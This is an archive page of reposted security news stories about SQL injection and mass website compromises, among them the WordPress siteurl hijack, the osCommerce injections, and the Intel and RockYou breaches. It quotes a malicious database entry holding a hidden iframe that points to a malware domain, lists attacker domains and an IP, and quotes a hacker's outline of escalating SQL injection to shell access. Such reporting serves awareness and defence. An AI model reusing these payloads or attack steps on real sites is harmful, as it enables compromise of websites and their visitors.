CyberInsecure.com

Archive for the ‘SQL Injections’ Category

Security researchers warn that a new mass injection attack affecting websites hosted at Rackspace and Media Temple. The compromises result in rogue JavaScript code being added to legit .js files used by the affected websites.

The new attack was reported by Denis Sinegubko, the creator of the Unmask Parasites website scanner. “Right before this week-end I noticed an increased number of sites hosted on MediaTemple and RackSpace coming to Unmask Parasites with the same problem — their sites are blocked by Google and their diagnostic pages mention the following five domains: ‘myads .name’, ‘adsnet .biz’, ‘toolbarcom .org’, ‘mybar .us’, ‘freead .name’,” the Web security expert notes.

What’s rather unusual about this attack is that the malicious code is not necessarily inserted into the .html files or .php scripts. In fact, this is hardly the case. Instead, the attackers add the rogue code to static .js files that already exist on the server.

Another noteworthy aspect of these injections is that the malicious JavaScript snippet is not added on new lines in the tainted files. It’s actually prepended to the first line in the document, making automatic removal a bit harder, since removing the entire line would also break the legit code. According to Sinegubko, automatic cleaning scripts should not remove stuff after “this.O=58441;var gr0=0;”.

The rogue JavaScript first performs a check to see if the visitor is a search engine crawler or a real user. The malicious payload will not be served to search engine bots. Real visitors will also only be targeted once after which a cookie will be set in their browser preventing them from being attacked in the future. There’s obviously no point in trying to re-infect a user that’s already been infected or on who’s computer the exploit failed.

The attackers serve the payload from multiple websites, most likely for redundancy and to make filtering harder. The rogue code will calculate a URL and load the malicious content from it. Sinegubko explains that there are 5 domains and 36 subdomain variations on each. That means 180 possible malicious URLs.

Websites hosted at both companies have been targeted in mass injections attacks before. However, their security staff haven’t found any particular vulnerability being exploited or any security hole in their own infrastructure. The Unmask Parasites creator suggests that this might be related to overly generous file permissions. He suggests changing the permissions of static static content files like .js, which hardly even get modified to 444 or even 400, if the Web app doesn’t need to change them either.

Credit: Softpedia.com News

The Pirate Bay has been compromised by an Argentinean hacker who made off with usernames, email and internet addresses of more than four million people signed up to the BitTorrent tracker site.

KrebsOnSecurity.com reported yesterday that Ch Russo broke into TPB’s system and grabbed the info from the notorious website, which might amuse some pro-copyright groups.

Russo had considered selling the private data, but in the end decided to go public about TPB’s shaky security credentials. He accessed the information via the site’s user database by exploiting its weakness to SQL injections.

“We wanted to tell people that their information may not be so well protected,” Russo said.

Meanwhile, it may be a coincidence, but The Pirate Bay is currently out of action and carried the following message:

“Upgrading some stuff, database is in use for backups, soon back again.. Btw, it’s nice weather outside I think.”

At this moment the website appears to be offline.

Credit: The Register

A security researcher claims he’s found a total of fourteen dangerous vulnerabilities in OpenCart. However, because the project’s lead developer is apparently unwilling to address security issues, he recommends that people migrate away from OpenCart as soon as possible. Security researchers also warn that multiple osCommerce websites have been compromised during the last few days. The rogue code injected into their pages attempts to infect visitors with malware served from an external domain.

OpenCart has grown to be one of the most popular open source online shopping cart systems along with osCommerce, Zen Cart and Magento. The software is used by thousands of online stores, that handle sensitive customer information on a daily basis.

Considering that people expect to be in a secure environment when they shop online, one would think that security is one of the primary development goals for such a project. However, a Mexican security researcher named Eduardo Vela, who goes by the online moniker of sirdarckcat, claims this couldn’t be further from the truth when it comes to OpenCart.

In his blog Mr. Vela explains that some time ago he tried to report several serious vulnerabilities to the OpenCart project on behalf of a fellow researcher who discovered them. Amongst these, there was a Local File Inclusion (LFI) flaw, an issue allowing remote arbitrary code execution and a critical cross-site request forgery (CSRF) bug, which could be exploited to take complete control of the Web application.

According to the researcher, who adheres to responsible disclosure practices, Daniel Kerr, the OpenCart lead developer asked not to bother him. Since then, further security audits of OpenCart performed by Mr. Vela and his associates have revealed a total of fourteen dangerous vulnerabilities, that, giving Daniel Kerr’s attitude towards security, will probably never get fixed. Therefore, the only advice left to give to webmasters is to stop using the product entirely.

The compromises of osCommerce websites have been detected by Sucuri Security, a company selling Website integrity monitoring solutions. An investigation into the incidents is ongoing, but it has been determined that all have been injected with a rogue script element loading code from an http://nt02. co.in/ 3 address [intentionally malformed].

So far most of the affected websites also had clandestine files uploaded in their /images folder. These files are called inclasses.php, loadclasses.php or phpclasses.php. “If you are an osCommerce user, please make sure to update your installation (and check your sites) as soon as possible,” Sucuri researcher David Dede, advises.

The company is still trying to determine how the attackers succeeded in compromising the websites, but an osCommerce Remote File Injection (RFI) vulnerability disclosed about a month ago, might be responsible. The bug is in “file_manager.php” and according to a SecurityFocus advisory, is the result of failure to properly sanitize user input.

osCommerce is notorious for extremely long wait times between releases. The latest stable version is 2.2 RC2a and has been released more than two and a half years ago, on January 30, 2008. However, there are a few measures webmasters can take to protect their websites.

Credit: Softpedia.com News

More than 100,000 webpages, some belonging to newspapers, police departments, and other large organizations, have been hit by an attack over the past few days that redirected visitors to a website that attempted to install malware on their machines.

The mass compromise appears to have affected sites running a banner-ads module on top of Microsoft’s Internet Information Services using ASP.net, said David Dede, head of malware research at Sucuri, a website monitoring firm. Intljobs.org, The Wall Street Journal’s wsj.com, The Jerusalem Post, tomtom.com.tw and the police department website for UK county of Strathclyde have been hacked.

Google searches on Tuesday indicated more than 100,000 pages were infected, Dede said, but that number had shrunk to about 7,750 at time of writing.

The sites were infected using SQL injection exploits, which allow attackers to tamper with a server’s database by typing commands into search boxes and other user-input fields. The hackers used the exploit to plant iframes in the compromised sites that redirected visitors to robint.us. Malicious javascript on that site attempted to infect end users with malware dubbed Mal/Behav-290 according to anti-virus firm Sophos.

Robint.us has been disabled, thanks to a sinkholing effort carried out by volunteer security outfit Shadowserver Foundation. The action will allow Shadowserver researchers to get a complete list of compromised sites and to gather additional information about how the attack was carried out, spokesman Andre’ M. Di Mino said in an email. He said the details would be published soon.

The SQL injection attacks came from Chinese IP address 121.14.154.69, Dede said. Robint.us was registered to a Dongguan Wanjian of Dongguan, China, according to whois records. Dede said he is still trying to determine the module that is being compromised in the mass hack attack.

Credit: The Register

Hundreds of WordPress-powered blog owners have recently found their websites inaccessible after a critical value has been altered in the database. The attack seems to affect even the latest version of the popular blog platform and, so far, the entry point has not been determined.

Sucuri Security Labs, a provider of Web-based integrity monitoring, reports that a worrying number of blogs were compromised the last week, in an attempt to silently redirect visitors to a malicious URL loading exploits. According to the company, most of the affected sites are hosted at Network Solutions.

The common symptom of the hack is an altered “siteurl” value in the “wp_options” database table. This variable should normally contain the main URL of the website, however, on affected installations, it is modified to a rogue <iframe> element pointing to a http://networkads.net/grep/ [don't open].

That’s how it looks like in the database:

(2, 0, ’siteurl’, ‘<iframe style=\”display:none\” height=\”0\” width=\” 1\” src=\”http://networkads.net/grep/\”></iframe>’, ‘yes’),

Since “siteurl” is not supposed to hold HTML code, this modification breaks the entire blog layout and prevents users and admins alike from reaching the website. The unusual technique suggests that the attackers are amateurs and not particularly familiar with the intricacies of the WordPress platform.

Another interesting aspect is that no one has successfully pinpointed the entry point used by the attackers, which could be either an unidentified security hole in WordPress or a common plug-in. “The only way for the database to be modified like that is via SQL injection or a bigger problem inside Network Solutions databases,” David Dede, a security researcher with Sucuri, said, however, no suspicious activity is registered in the access logs.

Shashi Bellamkonda, head of social media strategy at Network Solutions, challenged the idea that only blogs hosted with Network Solutions were affected. “Its not accurate to say that this affects only Network Solutions customers. It seems like there have been a spate of these attacks over the past few weeks,” he wrote in response to Sucuri’s report.

Fixing the rogue “siteurl” entry from the database might not be enough to mitigate this problem, as a lot of webmasters reported their blogs getting reinfected. It is also recommended to manually override the “siteurl” value via the wp_config.php.

To fix this issue, just revert your siteurl back to the previous value. Log in to your control panel, go to manage database, and edit the siteurl value on the wp-option table.

Update: It seems that a malicious user employed a script that automatically scoured the Network Solutions system for poorly secured accounts and, when found, modified the databases so the corresponding websites redirected users to the malicious website. The mass hack caused Network Solutions customers running WordPress to silently redirect visitors to malicious sites. Network Solutions has now closed the hole by resetting database passwords for the blogging software, the company said Sunday. Users should also review their settings for any administrative access accounts that aren’t recognized and if found delete them.

Credit: Softpedia.com News

Domestic appliance manufacturer Whirlpool has come under fire for failing to clean up a malware infection on one of its sites, months after it was notified of a problem by UK anti-virus firm Sophos.

Sophos tried for months to clean-up its Kitchenaid.com website, without success, before going public on the problem on Friday. The kitchen utensil selling site remains infected with the Badsrc-C (AKA Asprox) strain of malware five months after a Sophos customer reported a problem, which the security firm forwarded to the white goods firm.

The malicious script points towards nowhere at present, so there isn’t an immediate risk. The problem is that this may change at any time, hence the need for remedial action that Whirlpool seems reluctant to take.

“I and several of my colleagues have been trying to talk to contacts at KitchenAid and Whirlpool to inform them of the issue and offer assistance. We have consistently hit brick walls,” reports senior Sophos threat analyst Paul Baccas.

Whirlpool’s lack of action is symptomatic of a wider problem. Reports of malware problems on websites are hard even for security firms to send to the right person, are often disregarded and sometimes met with indignation, Baccas writes.

The Asprox strain of malware still lingering on Kitchenaid.com’s website has been linked to phishing spam. SQL injection attacks on vulnerable website have been a preferred method for spreading malware.

Credit: The Register

A Romanian grey hat hacker has disclosed an SQL inject (SQLi) vulnerability on a website belonging to the United States Army, which leads to full database compromise. The website, called Army Housing OneStop, is used to provide information about military housing facilities to soldiers. The website has been taken offline.

The Army Housing OneStop (AHOS) is “the official Army website for soldiers who need information about Military Family Housing (MFH), Unaccompanied Personnel Housing (UPH) and/or Community (Off-Post) Housing. It includes both comprehensive and quick-reference information for Army installations worldwide.”

A self-confessed security enthusiast, who goes by the online handle of TinKode, documented a proof-of-concept attack against the onestop.army.mil on his personal blog. The published screenshots reveal that the Web server runs on Microsoft Windows 2003 with Service Pack 2 and the database engine used to power the ASP website is Microsoft SQL Server 2000:

#Version: Microsoft SQL Server 2000 - 8.00.2282 (Intel X86) Dec 30 2008 02:22:41 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
#User: Dynatouch
#Database: AHOS
#Host Name: AHSGSVDAHQIT130

The AHOS website seems to have been developed by DynaTouch Corporation, a third-party government contractor that provides software and hardware solutions to create “self-service kiosk systems.” The company’s client portfolio includes a long list of local and federal government organizations.

There are a number of 76 databases on the server, but TinKode focused his attention on the one called “AHOS.” There are various tables in this database containing general website configuration information, but two in particular stand out as they are called “mgr_login” and “mgr_login_passwords.”

Upon investigating the latter, the hacker stumbled upon passwords stored in plain text, a major security oversight. Storing cryptographic hashes instead of the actual password strings has been a common practice in Web application programming for years now. Furthermore, if for convenience the hashes are generated with a weak algorithm, a technique known as “salting” can be employed to make them nearly impossible to crack.

In a time when even the most amateur programmers follow such security practices, the fact that many business or government websites do not boggles one’s mind. Additionally, the administrative account is called “Dynatouch” – who would have guessed that? – and its password is “AHOS” – yes, really.

Credit: Softpedia News

Security researchers warn that the Fox Sports website has been compromised by unknown attackers, who injected malicious code into a custom error page. There are two separate offensive script tags, each of them created by a different infection.

The page was detected by the ThreatSeeker Network system developed and operated by Websense, a Web security vendor. Security researchers investigating the suspicious link determined that it was pointing to a custom “Page not Found” document, displayed in case of a 404 error.

Webmasters deploy such pages in order to help visitors who are looking for a Web resource that is no longer available. They include suggestions or search boxes that can be used to find the new location of the document.

The msn.foxsports.com website is operated by the Fox Sports division of the Fox Broadcasting Company and according to Alexa, it is in the top 330 websites in the world as far as traffic goes. This website is ranked at position 88 in the United States and is part of the MSN network.

The first malicious script tag loads a script for an external domain used in cybercriminal operations before. In particular, this script is part of the latest version of a mass injection attack known as Gumblar. Highly obfuscated code is used to perform various checks to determine a visitor’s browser, operating system or installed software, and then execute exploits for known vulnerabilities.

“After deobfuscation, the page uses PDF and Flash exploits to run malware in order to control a victim’s computer. In addition, a piece of VBScript is executed to download malware,” the Websense researchers explain.

The secondary script tag loads a potentially malicious JavaScript file from a .cn domain. However, the server hosting this threat was offline and the security analysts couldn’t determine its nature. The Fox Sports page seems to be clean now, but there is no way of telling for how long this infection ran until it was discovered.

It is worth noting that a similar issue was found on the MSN Canada website back in June. In that case, a redirect page, invisible to the user, but parsed by the browser, was infected with malicious code.

Credit: Softpedia.com

A Romanian hacker who goes by the handle “unu” has struck again: this time, he demonstrated how a SQL injection vulnerability left personal information in the form of passports exposed on an Intel Corp. Website.

Unu, who previously exposed SQL injection vulnerabilities in The Wall Street Journal and Kaspersky Lab’s Websites, this time focused on an Intel site that runs online registrations for channel partner events. The site, which is currently down, has a message posted that it’s offline for maintenance.

An Intel spokesperson says the company has taken down the site and is “investigating the matter.”

In his blog post on the Intel site’s vulnerability, unu says: “Not only is the website vulnerable to sql injection but it also allows load_file to be executed making it very dangerous because with a little patience, a writable directory can be found and injection a malicious code we get command line access with which we can do virtually anything we want with the website: upload phpshells, redirects, INFECT PAGES WITH TROJAN DROPPERS, even deface the whole website.”

He was able to hack into the front-end Web application and then discovered that server administrators had their passwords stored in clear text, according to the post.

Security experts at Praetorian Security Group who analyzed Unu’s hack say most alarming about the hack is a screenshot that appears to show people who registered for an event, along with their passport numbers, birth dates, and credit card types. “Unu acknowledges that he simply is not showing the credit card numbers, expiration dates, and CW/CID codes but they are also in the table,” they blogged.

Daniel Kennedy, a partner with Praetorian, says the site had been defaced before by someone else before. “So Intel or the supporting vendor has to take a long look at who besides Unu could have been in that database,” Kennedy says.

“Intel realistically has to notify everyone who could be affected … this is passport and credit card data,” he says.

Credit: DarkReading.com, unu123456.baywords.com

Millions of user passwords to social networking sites have been exposed, after a serious SQL injection flaw on the Rockyou.com website left login details - stored in plain text - up for grabs.

RockYou - which develops apps for social networking sites including Facebook, Bebo and MySpace - stored usernames, passwords and email addresses in plain text. That’s bad enough in itself, but then an SQL injection flaw on RockYou’s website exposed the information to prying eyes.

Amichai Shulman, chief technology officer with the data security firm Imperva, said the passwords exposed will often be the same as those users utilize for webmail accounts associated with their social networking profiles, creating yet more potential problems.

The first issue is that RockYou attempted to downplay the entire incident, first by covering it up by not notifying users and then downplaying it in an official statement as being an issue that only affected ‘older’ applications. The hacker responsible for the initial breach published a small portion of the dataset he had retrieved and was able to show that not only did he have access to their entire database, but also passwords were stored in the clear. This matter now appears worse than originally suspected as the dataset also contains a table where RockYou have stored user credentials for social networks and other partner sites.

The database consists of a table containing partner data, and another table that has stored the credentials for those partner sites that users have entered. This includes social networks such as MySpace but also webmail accounts.

The initial exploit took advantage of a trivial SQL injection vulnerability, a technique that has been well documented for over a decade. The method of vulnerability is extremely basic in execution, yet catastrophic in impact – which RockYou, and the sites users, are now learning the hard way. It is more of a surprise that this had not happen sooner – as the RockYou platform is a swiss cheese of security vulnerabilities and poor practices.

“The bad news is that the SQL injection flaw could have allowed hackers to access the 32 million entries of user names plus passwords in the Rockyou.com database… since the user names and passwords are by default the same as the user’s webmail account — such as Hotmail, Yahoo or Gmail — this is a major lapse in security,” Shulman said.

“Unfortunately some accounts had already been compromised before the vulnerability was fixed,” Shulman said. “All users need to be cautious and ensure they change their email passwords as their credentials may have been put at risk.”

It’s unclear why RockYou left passwords on its systems without encrypting them in the first place. We dropped a note to the developers asking for a response on this point on Tuesday, but are yet to hear back. We’ll update this story as and when we know more.

RockYou has reportedly fixed the issue, but this may have come too late for some.

Credit: The Register, TechCrunch.com